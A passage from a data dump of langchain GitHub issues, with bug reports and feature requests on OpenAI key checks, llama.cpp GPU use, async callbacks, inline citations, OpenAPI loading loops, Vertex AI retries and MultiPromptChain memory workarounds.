] | null | How to parse a docx/pdf file which contains text, tables, and images? Also, we need to classify text, tables, and images; maybe the operations are different? Thanks | https://api.github.com/repos/langchain-ai/langchain/issues/7252/comments | 2 | 2023-07-06T04:35:02Z | 2023-10-12T16:06:10Z | https://github.com/langchain-ai/langchain/issues/7252 | 1,790,785,354 | 7,252
[
"langchain-ai",
"langchain"
] | ### Feature request
How to disable the OpenAI initialization when you're not using an OpenAI model.
[Please check this issue](https://github.com/hwchase17/langchain/issues/7189#issuecomment-1621931461)
### Motivation
I am trying to build a VectorstoreIndexCreator using the following configuration:
- embeddings: SentenceTransformerEmbeddings
- vectorstore_cls: Chroma
- llm: HuggingFaceHub model
Note: I am not using any OpenAI model, either as the LLM or for embeddings.
here is the code
```
from langchain.indexes import VectorstoreIndexCreator
from langchain.vectorstores import Chroma
from langchain.text_splitter import CharacterTextSplitter
from langchain.embeddings import SentenceTransformerEmbeddings
from langchain.llms import HuggingFaceHub
from langchain.document_loaders import PyPDFLoader
loader = PyPDFLoader("pdffile.pdf")
embeddings = SentenceTransformerEmbeddings(model_name="paraphrase-MiniLM-L6-v2")
model = HuggingFaceHub(repo_id="facebook/mbart-large-50",
model_kwargs={"temperature": 0, "max_length":200},
huggingfacehub_api_token=HUGGING_FACE_API_KEY)
index = VectorstoreIndexCreator(
embedding=embeddings,
vectorstore_cls=Chroma,
text_splitter=CharacterTextSplitter(chunk_size=100,chunk_overlap=0)
).from_loaders([loader])
result = index.query(llm=model,question=query,chain_type="refine")
```
But I am still getting the OpenAI key dependency error when I run the code:
```
Did not find openai_api_key, please add an environment variable `OPENAI_API_KEY` which contains it, or pass `openai_api_key` as a named parameter. (type=value_error)
```
using langchain version: langchain==0.0.219
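Until the eager validation is removed, a workaround people often use (hedged — it only papers over the check; nothing is sent to OpenAI as long as no OpenAI component is actually invoked) is to set a dummy key before constructing the index:

```python
import os

# Satisfies the constructor-time key check without ever calling OpenAI.
os.environ.setdefault("OPENAI_API_KEY", "sk-placeholder-not-used")
print(os.environ["OPENAI_API_KEY"])
```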
### Your contribution
To disable the OpenAI initialization when you're not using an OpenAI model | How to disable the OpenAI initialization when you're not using an OpenAI model | https://api.github.com/repos/langchain-ai/langchain/issues/7251/comments | 3 | 2023-07-06T04:19:04Z | 2024-03-02T14:38:20Z | https://github.com/langchain-ai/langchain/issues/7251 | 1,790,771,160 | 7,251 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain : 0.0.223
os: mac Ventura 13.4.1 max
python: 3.11.3
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
I have compiled the llama.cpp project with MPS support and verified, via the command line, that GPU acceleration works under MPS. However, when calling the model through LangChain with `n_gpu_layers` set to 1, MPS GPU acceleration is not enabled. Below are the code and its output.
```python
callback_manager = CallbackManager([StreamingStdOutCallbackHandler()])
llm = LlamaCpp(model_path="./zh-models/33B/ggml-model-q4_K.bin", n_ctx=2048,
               n_gpu_layers=1, callback_manager=callback_manager, verbose=True)
llm("tell me a joke")
```
```
llama_model_load_internal: format = ggjt v3 (latest)
llama_model_load_internal: n_vocab = 49954
llama_model_load_internal: n_ctx = 2048
llama_model_load_internal: n_embd = 6656
llama_model_load_internal: n_mult = 256
llama_model_load_internal: n_head = 52
llama_model_load_internal: n_layer = 60
llama_model_load_internal: n_rot = 128
llama_model_load_internal: ftype = 2 (mostly Q4_0)
llama_model_load_internal: n_ff = 17920
llama_model_load_internal: model size = 30B
llama_model_load_internal: ggml ctx size = 0.14 MB
llama_model_load_internal: mem required = 19884.88 MB (+ 3124.00 MB per state)
llama_new_context_with_model: kv self size = 3120.00 MB
AVX = 0 | AVX2 = 0 | AVX512 = 0 | AVX512_VBMI = 0 | AVX512_VNNI = 0 | FMA = 0 | NEON = 1 | ARM_FMA = 1 | F16C = 0 | FP16_VA = 1 | WASM_SIMD = 0 | BLAS = 1 | SSE3 = 0 | VSX = 0 |
```
### Expected behavior
support mps gpu acceleration | Does LlamaCPP currently not support the gpu acceleration of mps when n_gpu_layer to 1? | https://api.github.com/repos/langchain-ai/langchain/issues/7249/comments | 0 | 2023-07-06T03:50:02Z | 2023-07-06T03:56:20Z | https://github.com/langchain-ai/langchain/issues/7249 | 1,790,747,965 | 7,249 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Add `show_progress_bar` within `OpenAIEmbeddings` class.
### Motivation
Simply speaking,
1. Showing a progress bar inside an existing progress bar is generally bad practice; most of the time it will break.
2. There might be people who want to keep their console quiet.
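A sketch of how the flag could look (`show_progress_bar` is the proposal here, not an existing parameter, and `_embed` stands in for the real API call):

```python
from typing import List

class OpenAIEmbeddingsSketch:
    def __init__(self, show_progress_bar: bool = False):
        self.show_progress_bar = show_progress_bar

    def _embed(self, text: str) -> List[float]:
        return [float(len(text))]  # placeholder for the real embedding request

    def embed_documents(self, texts: List[str]) -> List[List[float]]:
        iterator = texts
        if self.show_progress_bar:
            from tqdm.auto import tqdm  # imported lazily, so tqdm stays optional
            iterator = tqdm(texts)
        return [self._embed(t) for t in iterator]

print(OpenAIEmbeddingsSketch().embed_documents(["ab", "abc"]))  # [[2.0], [3.0]]
```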
### Your contribution
I will make a PR | Make tqdm optional for OpenAIEmbeddings | https://api.github.com/repos/langchain-ai/langchain/issues/7246/comments | 1 | 2023-07-06T02:21:17Z | 2023-07-06T03:58:55Z | https://github.com/langchain-ai/langchain/issues/7246 | 1,790,672,805 | 7,246 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
A continuation of #7126,
There are Pinecone features in LangChain that are not mentioned in LangChain's documentation. https://python.langchain.com/docs/modules/data_connection/vectorstores/integrations/pinecone
### Idea or request for content:
Add documentation for the other Pinecone functions. | DOC: Pinecone functions need more documentation | https://api.github.com/repos/langchain-ai/langchain/issues/7243/comments | 1 | 2023-07-06T00:15:48Z | 2023-10-12T16:06:20Z | https://github.com/langchain-ai/langchain/issues/7243 | 1,790,553,866 | 7,243 |
[
"langchain-ai",
"langchain"
] | ### System Info
Langchain Version: 0.0.224
Platform: Mac
Python Version: 3.10.9
### Who can help?
_No response_
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [x] Callbacks/Tracing
- [x] Async
### Reproduction
Copy/Paste of example snippet from official documentation:
https://python.langchain.com/docs/modules/callbacks/how_to/async_callbacks
```python
import asyncio
from typing import Any, Dict, List

from langchain.chat_models import ChatOpenAI
from langchain.schema import LLMResult, HumanMessage
from langchain.callbacks.base import AsyncCallbackHandler, BaseCallbackHandler
from dotenv import load_dotenv

load_dotenv()


class MyCustomSyncHandler(BaseCallbackHandler):
    def on_llm_new_token(self, token: str, **kwargs) -> None:
        print(f"Sync handler being called in a `thread_pool_executor`: token: {token}")


class MyCustomAsyncHandler(AsyncCallbackHandler):
    """Async callback handler that can be used to handle callbacks from langchain."""

    async def on_llm_start(
        self, serialized: Dict[str, Any], prompts: List[str], **kwargs: Any
    ) -> None:
        """Run when chain starts running."""
        print("zzzz....")
        await asyncio.sleep(0.3)
        class_name = serialized["name"]
        print("Hi! I just woke up. Your llm is starting")

    async def on_llm_end(self, response: LLMResult, **kwargs: Any) -> None:
        """Run when chain ends running."""
        print("zzzz....")
        await asyncio.sleep(0.3)
        print("Hi! I just woke up. Your llm is ending")


# To enable streaming, we pass in `streaming=True` to the ChatModel constructor
# Additionally, we pass in a list with our custom handler
chat = ChatOpenAI(
    max_tokens=25,
    streaming=True,
    callbacks=[MyCustomSyncHandler(), MyCustomAsyncHandler()],
)


async def main():
    await chat.agenerate([[HumanMessage(content="Tell me a joke")]])


if __name__ == '__main__':
    asyncio.run(main())
```
#####################################################
Output:
zzzz....
Error in MyCustomAsyncHandler.on_llm_start callback: 'name'
Retrying langchain.chat_models.openai.acompletion_with_retry.<locals>._completion_with_retry in 1.0 seconds as it raised APIConnectionError: Error communicating with OpenAI.
Retrying langchain.chat_models.openai.acompletion_with_retry.<locals>._completion_with_retry in 2.0 seconds as it raised APIConnectionError: Error communicating with OpenAI.
Retrying langchain.chat_models.openai.acompletion_with_retry.<locals>._completion_with_retry in 4.0 seconds as it raised APIConnectionError: Error communicating with OpenAI.
Retrying langchain.chat_models.openai.acompletion_with_retry.<locals>._completion_with_retry in 8.0 seconds as it raised APIConnectionError: Error communicating with OpenAI.
Retrying langchain.chat_models.openai.acompletion_with_retry.<locals>._completion_with_retry in 16.0 seconds as it raised APIConnectionError: Error communicating with OpenAI.
Traceback (most recent call last):
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/connector.py", line 980, in _wrap_create_connection
return await self._loop.create_connection(*args, **kwargs) # type: ignore[return-value] # noqa
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/base_events.py", line 1097, in create_connection
transport, protocol = await self._create_connection_transport(
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/base_events.py", line 1127, in _create_connection_transport
await waiter
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/sslproto.py", line 534, in data_received
ssldata, appdata = self._sslpipe.feed_ssldata(data)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/sslproto.py", line 188, in feed_ssldata
self._sslobj.do_handshake()
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/ssl.py", line 975, in do_handshake
self._sslobj.do_handshake()
ssl.SSLCertVerificationError: [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:997)
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/openai/api_requestor.py", line 592, in arequest_raw
result = await session.request(**request_kwargs)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/client.py", line 536, in _request
conn = await self._connector.connect(
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/connector.py", line 540, in connect
proto = await self._create_connection(req, traces, timeout)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/connector.py", line 901, in _create_connection
_, proto = await self._create_direct_connection(req, traces, timeout)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/connector.py", line 1206, in _create_direct_connection
raise last_exc
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/connector.py", line 1175, in _create_direct_connection
transp, proto = await self._wrap_create_connection(
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/aiohttp/connector.py", line 982, in _wrap_create_connection
raise ClientConnectorCertificateError(req.connection_key, exc) from exc
aiohttp.client_exceptions.ClientConnectorCertificateError: Cannot connect to host api.openai.com:443 ssl:True [SSLCertVerificationError: (1, '[SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: unable to get local issuer certificate (_ssl.c:997)')]
The above exception was the direct cause of the following exception:
Traceback (most recent call last):
File "/Users/pnsvk/my-apps/p_y/llm-apps/async_callbacks.py", line 49, in <module>
asyncio.run(main())
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/runners.py", line 44, in run
return loop.run_until_complete(main)
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/asyncio/base_events.py", line 649, in run_until_complete
return future.result()
File "/Users/pnsvk/my-apps/p_y/llm-apps/async_callbacks.py", line 45, in main
res = await chat.agenerate([[HumanMessage(content="Tell me a joke")]])
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/langchain/chat_models/base.py", line 191, in agenerate
raise exceptions[0]
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/langchain/chat_models/base.py", line 292, in _agenerate_with_cache
return await self._agenerate(
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/langchain/chat_models/openai.py", line 408, in _agenerate
async for stream_resp in await acompletion_with_retry(
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/langchain/chat_models/openai.py", line 95, in acompletion_with_retry
return await _completion_with_retry(**kwargs)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/tenacity/_asyncio.py", line 86, in async_wrapped
return await fn(*args, **kwargs)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/tenacity/_asyncio.py", line 48, in __call__
do = self.iter(retry_state=retry_state)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/tenacity/__init__.py", line 362, in iter
raise retry_exc.reraise()
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/tenacity/__init__.py", line 195, in reraise
raise self.last_attempt.result()
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/concurrent/futures/_base.py", line 451, in result
return self.__get_result()
File "/Library/Frameworks/Python.framework/Versions/3.10/lib/python3.10/concurrent/futures/_base.py", line 403, in __get_result
raise self._exception
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/tenacity/_asyncio.py", line 51, in __call__
result = await fn(*args, **kwargs)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/langchain/chat_models/openai.py", line 93, in _completion_with_retry
return await llm.client.acreate(**kwargs)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/openai/api_resources/chat_completion.py", line 45, in acreate
return await super().acreate(*args, **kwargs)
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/openai/api_resources/abstract/engine_api_resource.py", line 217, in acreate
response, _, api_key = await requestor.arequest(
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/openai/api_requestor.py", line 304, in arequest
result = await self.arequest_raw(
File "/Users/pnsvk/my-venv-3.10/lib/python3.10/site-packages/openai/api_requestor.py", line 609, in arequest_raw
raise error.APIConnectionError("Error communicating with OpenAI") from e
openai.error.APIConnectionError: Error communicating with OpenAI
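Separately from the SSL failure (which looks environmental), the `Error in MyCustomAsyncHandler.on_llm_start callback: 'name'` line suggests `serialized` no longer carries a `"name"` key. A defensive lookup (assumption: the serialized payload carries an `"id"` path, as in recent LangChain versions) avoids the callback error:

```python
from typing import Any, Dict

def class_name_from_serialized(serialized: Dict[str, Any]) -> str:
    # Prefer the legacy "name" key, fall back to the last "id" path element.
    if "name" in serialized:
        return serialized["name"]
    ident = serialized.get("id")
    if isinstance(ident, list) and ident:
        return str(ident[-1])
    return "<unknown>"

print(class_name_from_serialized({"id": ["langchain", "chat_models", "ChatOpenAI"]}))  # ChatOpenAI
```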
### Expected behavior
As mentioned in the official documentation:
zzzz....
Hi! I just woke up. Your llm is starting
Sync handler being called in a `thread_pool_executor`: token:
Sync handler being called in a `thread_pool_executor`: token: Why
Sync handler being called in a `thread_pool_executor`: token: don
Sync handler being called in a `thread_pool_executor`: token: 't
Sync handler being called in a `thread_pool_executor`: token: scientists
Sync handler being called in a `thread_pool_executor`: token: trust
Sync handler being called in a `thread_pool_executor`: token: atoms
Sync handler being called in a `thread_pool_executor`: token: ?
Sync handler being called in a `thread_pool_executor`: token:
Sync handler being called in a `thread_pool_executor`: token: Because
Sync handler being called in a `thread_pool_executor`: token: they
Sync handler being called in a `thread_pool_executor`: token: make
Sync handler being called in a `thread_pool_executor`: token: up
Sync handler being called in a `thread_pool_executor`: token: everything
Sync handler being called in a `thread_pool_executor`: token: .
Sync handler being called in a `thread_pool_executor`: token:
zzzz....
Hi! I just woke up. Your llm is ending
LLMResult(generations=[[ChatGeneration(text="Why don't scientists trust atoms? \n\nBecause they make up everything.", generation_info=None, message=AIMessage(content="Why don't scientists trust atoms? \n\nBecause they make up everything.", additional_kwargs={}, example=False))]], llm_output={'token_usage': {}, 'model_name': 'gpt-3.5-turbo'}) | Async callback has issues | https://api.github.com/repos/langchain-ai/langchain/issues/7242/comments | 2 | 2023-07-06T00:03:04Z | 2023-07-06T12:43:26Z | https://github.com/langchain-ai/langchain/issues/7242 | 1,790,539,904 | 7,242 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Include source document index information in the combine document chain prompt. For example in `_get_inputs` of `StuffDocumentChain` we could make the following change (in addition to corresponding changes to `format_document`):
```
# From
doc_strings = [format_document(doc, self.document_prompt) for doc in docs]
# To
doc_strings = [format_document(doc, i, self.document_prompt) for i, doc in enumerate(docs)]
```
### Motivation
The point of this change is to enable QA based chains (e.g. `ConversationalRetrievalChain`) to easily do inline citations using the source document's index.
## Example
### Prompt
```
Context:
[1] Harrison went to Harvard.
[2] Ankush went to Princeton.
[3] Emma went to Yale.
Question:
Where did Harrison and Emma go to college?
```
### Response
```
Harrison went to Harvard【1】 and Emma went to Yale【3】.
```
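The formatting side of the proposal is tiny; a stand-alone sketch (the function name is illustrative, not LangChain's API) of numbering documents before they enter the prompt:

```python
from typing import List

def format_documents_with_indices(docs: List[str]) -> str:
    # 1-based indices so the model can cite them as [1], [2], ...
    return "\n".join(f"[{i + 1}] {doc}" for i, doc in enumerate(docs))

context = format_documents_with_indices([
    "Harrison went to Harvard.",
    "Ankush went to Princeton.",
    "Emma went to Yale.",
])
print(context)
```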
This type of structure is also found in popular "QA" models like Bing Chat and ChatGPT's Browse feature (WebGPT etc.). I feel like there should at least be high-level options to enable something like this without having to make custom modifications/extensions to the existing chains.
Without explicitly including these document indices, I find that prompting the LLM to cite documents by index can lead to hallucinated citations (e.g., with `k=4` retrieved documents it might cite "[8]").
## More Details
As far as I can tell, existing QA implementations in Langchain seem to return source documents separately (i.e. `return_source_documents=True`), or at the end of the response (e.g. `{'output_text': ' The president thanked Justice Breyer for his service.\nSOURCES: 30-pl'}` as in [document-qa-with-sources](https://python.langchain.com/docs/modules/chains/additional/question_answering#document-qa-with-sources)) rather than provide them in-line.
Even newer approaches using OpenAI's Functions API e.g. from `create_citation_fuzzy_match_chain` and `create_qa_with_sources_chain` do not provide this option.
The approach of [QA with sources chain](https://python.langchain.com/docs/modules/chains/additional/openai_functions_retrieval_qa) has the drawback that the LLM has to generate the entire source of the document (e.g., the full URL). This is slower than simply referencing the document's index. It is also prone to hallucination, especially with `gpt-3.5`, where fake sources (like URLs) can be generated.
Similarly, the method in [Question-Answering Citations](https://python.langchain.com/docs/modules/chains/additional/qa_citations) provides quotes from source documents, but doesn't actually identify which document they're from. Referencing documents by index should help reduce hallucination and generation speed here as well.
### Your contribution
I'm happy to assist with this, but first I'd like to gather feedback on the idea. It's possible that there are existing approaches or best practices that I'm not familiar with, which could facilitate inline citations without additional implementation. If there are any recommendations on how to proceed with this, I'd be interested in having a discussion around that. | Add Document Index Information for QA Inline Citations | https://api.github.com/repos/langchain-ai/langchain/issues/7239/comments | 22 | 2023-07-05T22:46:45Z | 2024-05-16T16:06:39Z | https://github.com/langchain-ai/langchain/issues/7239 | 1,790,462,714 | 7,239 |
[
"langchain-ai",
"langchain"
] | ### System Info
langchain: '0.0.218'
windows 10
### Who can help?
@dev2049 @homanp
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [X] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Run the following:
```py
from langchain.chains.openai_functions.openapi import get_openapi_chain
chain = get_openapi_chain("https://chat-web3-plugin.alchemy.com/openapi.yaml")
chain.run("DOES NOT MATTER")
```
Results in endless loop
```shell
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
Attempting to load an OpenAPI 3.0.0 spec. This may result in degraded performance. Convert your OpenAPI spec to 3.1.* spec for better support.
...
```
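Whatever the exact trigger in the spec loader, the generic fix for this class of bug is a visited-set while dereferencing `$ref`s; an illustrative sketch (not LangChain's implementation):

```python
from typing import Any, Dict, Optional, Set

def resolve_refs(node: Any, schemas: Dict[str, Any], seen: Optional[Set[str]] = None) -> Any:
    seen = set() if seen is None else seen
    if isinstance(node, dict):
        ref = node.get("$ref")
        if ref is not None:
            if ref in seen:  # cycle detected: stop instead of recursing forever
                return {"$ref": ref}
            return resolve_refs(schemas[ref.rsplit("/", 1)[-1]], schemas, seen | {ref})
        return {key: resolve_refs(value, schemas, seen) for key, value in node.items()}
    if isinstance(node, list):
        return [resolve_refs(item, schemas, seen) for item in node]
    return node

# A self-referential schema terminates instead of looping:
schemas = {"Node": {"type": "object", "child": {"$ref": "#/components/schemas/Node"}}}
print(resolve_refs({"$ref": "#/components/schemas/Node"}, schemas))
```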
### Expected behavior
Loop should break | OpenAPISpec functions can get stuck in a loop | https://api.github.com/repos/langchain-ai/langchain/issues/7233/comments | 2 | 2023-07-05T21:31:57Z | 2023-10-12T16:06:26Z | https://github.com/langchain-ai/langchain/issues/7233 | 1,790,374,247 | 7,233 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Still new here, so I mimicked the setup of the `llm/llamacpp.py` wrapper for a draft integration of Salesforce's new LLM [XGen](https://huggingface.co/spaces/HuggingFaceH4/open_llm_leaderboard/discussions/91).
### Motivation
Expand the LLM sets integrated in Langchain.
### Your contribution
PR #7221 | Salesforce XGen integration | https://api.github.com/repos/langchain-ai/langchain/issues/7223/comments | 1 | 2023-07-05T19:54:04Z | 2023-07-06T04:53:07Z | https://github.com/langchain-ai/langchain/issues/7223 | 1,790,201,590 | 7,223 |
[
"langchain-ai",
"langchain"
] | ### Issue you'd like to raise.
Hi I found myself having to do a "hack" when using MultiPromptChain.
In particular, when my destination chains take more than one parameter into the template at runtime, for example `{current_timestamp}`,
I was getting the following exception:
```
File "/home/xxx/venv/lib/python3.10/site-packages/langchain/chains/base.py", line 149, in __call__
inputs = self.prep_inputs(inputs)
File "/home/xxx/venv/lib/python3.10/site-packages/langchain/chains/base.py", line 258, in prep_inputs
self._validate_inputs(inputs)
File "/home/xyz/venv/lib/python3.10/site-packages/langchain/chains/base.py", line 103, in _validate_inputs
raise ValueError(f"Missing some input keys: {missing_keys}")
ValueError: Missing some input keys: {'current_timestamp'}
```
I had the below configuration:
```
destinations = [f"{p['name']}: {p['description']}" for p in tools.prompt_infos]
destinations_str = "\n".join(destinations)
router_template = MULTI_PROMPT_ROUTER_TEMPLATE.format(destinations=destinations_str,
current_timestamp=datetime.now().isoformat())
router_prompt = PromptTemplate(
template=router_template,
input_variables=["input"],
output_parser=RouterOutputParser(),
)
router_chain = LLMRouterChain.from_llm(llm, router_prompt)
chain = MultiPromptChain(
router_chain=router_chain,
destination_chains=tools.chains,
default_chain=default_chain
verbose=True,
)
```
which had to be modified
first:
I used modified router template
```
MY_MULTI_PROMPT_ROUTER_TEMPLATE = """\
Given a raw text input to a language model select the model prompt best suited for \
the input. You will be given the names of the available prompts and a description of \
what the prompt is best suited for. You may also revise the original input if you \
think that revising it will ultimately lead to a better response from the language \
model.
<< FORMATTING >>
Return a markdown code snippet with a JSON object formatted to look like:
```json
{{{{
    "destination": string \\ name of the prompt to use or "DEFAULT"
    "next_inputs": dict \\ dictionary with two fields: "input" containing the original input and "current_timestamp" containing {current_timestamp}
}}}}
```
REMEMBER: "destination" MUST be one of the candidate prompt names specified below OR
it can be "DEFAULT" if the input is not well suited for any of the candidate prompts.
REMEMBER: "next_inputs" can just be the original input if you don't think any \
modifications are needed.
<< CANDIDATE PROMPTS >>
{destinations}
<< INPUT >>
{{input}}
<< OUTPUT >>
"""
```
I also had to change the implementation of RouterOutputParser where I changed
line 102 from
```
parsed["next_inputs"] = {self.next_inputs_inner_key: parsed["next_inputs"]}
to
parsed["next_inputs"] = parsed["next_inputs"]
```
This has allowed me to return and pass the desired next_inputs dict, including current_timestamp, into the destination chain.
My chain initialization has changed to the following:
```
destinations = [f"{p['name']}: {p['description']}" for p in tools.prompt_infos]
destinations_str = "\n".join(destinations)
router_template = MY_MULTI_PROMPT_ROUTER_TEMPLATE.format(destinations=destinations_str,
current_timestamp=datetime.now().isoformat())
router_prompt = PromptTemplate(
template=router_template,
input_variables=["input"],
output_parser=MyRouterOutputParser(next_inputs_inner_key="input", next_inputs_type=dict),
)
router_chain = LLMRouterChain.from_llm(llm, router_prompt)
chain = MultiPromptChain(
router_chain=router_chain,
destination_chains=tools.chains,
default_chain=tools.chains[ConversationStage.CASUAL.value],
verbose=True,
)
```
so I managed to pass the correct parameters to the destination chain, but then I faced a new issue:
```
File "/home/xxx/venv/lib/python3.10/site-packages/langchain/memory/utils.py", line 21, in get_prompt_input_key
    raise ValueError(f"One input key expected got {prompt_input_keys}")
ValueError: One input key expected got ['current_timestamp', 'input']
```
after investigation I had to define a new MyConversationBufferMemory
```
class MyConversationBufferMemory(ConversationBufferMemory):
other_keys: list = []
@property
def memory_variables(self) -> List[str]:
"""Will always return list of memory variables.
:meta private:
"""
return [self.memory_key] + self.other_keys
```
and instead of creating my memory in this way
`memory = ConversationBufferMemory(memory_key="chat_history", chat_memory=get_history(user_id))`
I have created it in this way
`memory = MyConversationBufferMemory(memory_key="chat_history", chat_memory=get_history(user_id),other_keys=['current_timestamp'])`
This has finally allowed me to get the response from the destination chain.
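For context, the check that raised the `One input key expected` error is a small heuristic; a rough re-implementation (an assumption — it should mirror `langchain/memory/utils.py` of this era) shows why one extra key such as `current_timestamp` trips it:

```python
# Minimal re-implementation of the memory input-key heuristic
# (assumption: mirrors langchain/memory/utils.py of this era).
def get_prompt_input_key(inputs: dict, memory_variables: list) -> str:
    # the prompt input key is whatever remains after removing
    # memory variables and the reserved "stop" key
    prompt_input_keys = list(set(inputs) - set(memory_variables) - {"stop"})
    if len(prompt_input_keys) != 1:
        raise ValueError(f"One input key expected got {prompt_input_keys}")
    return prompt_input_keys[0]

# one extra key (current_timestamp) is enough to trip the check
try:
    get_prompt_input_key(
        {"input": "hi", "current_timestamp": "now", "chat_history": []},
        ["chat_history"],
    )
    tripped = False
except ValueError:
    tripped = True
```

This also explains why overriding `memory_variables` (as in `MyConversationBufferMemory` above) makes the extra keys invisible to the heuristic.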
If someone has followed along, do you think there is a better way of doing it?
### Suggestion:
_No response_ | Issue: Issue with MutliPromptRouter with memory destination chains | https://api.github.com/repos/langchain-ai/langchain/issues/7220/comments | 2 | 2023-07-05T19:50:23Z | 2023-10-12T16:06:31Z | https://github.com/langchain-ai/langchain/issues/7220 | 1,790,197,414 | 7,220 |
[
"langchain-ai",
"langchain"
] | ### Feature request
Add retry policy to VertexAI models.
### Motivation
E.g., when trying to run a summarization chain on many chunks (I reproduce the error with 99 chunks), an exception `ResourceExhausted: 429 Quota exceeded` might be returned by Vertex.
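The usual remedy is exponential backoff; a generic pure-Python sketch of the idea (illustrative only — not the actual implementation proposed for the PR):

```python
import random
import time

def call_with_retries(fn, max_attempts=6, base_delay=1.0, retryable=(Exception,)):
    """Generic exponential backoff with jitter — an illustrative sketch of the
    retry idea, not the actual langchain/Vertex implementation."""
    for attempt in range(max_attempts):
        try:
            return fn()
        except retryable:
            if attempt == max_attempts - 1:
                raise  # out of attempts: surface the original error
            # exponential growth plus jitter to avoid synchronized retries
            time.sleep(base_delay * (2 ** attempt) * (0.5 + random.random() / 2))

# demo: a call that fails twice with a quota error, then succeeds
attempts = {"n": 0}
def flaky_predict():
    attempts["n"] += 1
    if attempts["n"] < 3:
        raise RuntimeError("429 Quota exceeded")
    return "summary chunk"

result = call_with_retries(flaky_predict, base_delay=0.001)
```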
### Your contribution
yes, I'll submit a PR shortly. | Add retries to VertexAI models | https://api.github.com/repos/langchain-ai/langchain/issues/7217/comments | 1 | 2023-07-05T18:45:48Z | 2023-07-10T08:52:37Z | https://github.com/langchain-ai/langchain/issues/7217 | 1,790,092,753 | 7,217 |
[
"langchain-ai",
"langchain"
] | ### Issue with current documentation:
More of a clarification than an issue. The JavaScript documentation describes the Document interface: https://js.langchain.com/docs/modules/schema/document. Does an equivalent exist in the Python version? When I try `from langchain.document import Document` in Python, it throws an error.
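For what it's worth, in the Python package of this era the class typically lives at `langchain.schema` (i.e. `from langchain.schema import Document`) rather than `langchain.document` — an assumption worth verifying against the installed version. Its shape is roughly:

```python
from dataclasses import dataclass, field

# Minimal stand-in mirroring the Python Document shape (page_content/metadata,
# versus pageContent in the JS docs) — not the real class.
@dataclass
class Document:
    page_content: str
    metadata: dict = field(default_factory=dict)

doc = Document(page_content="hello world")
```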
### Idea or request for content:
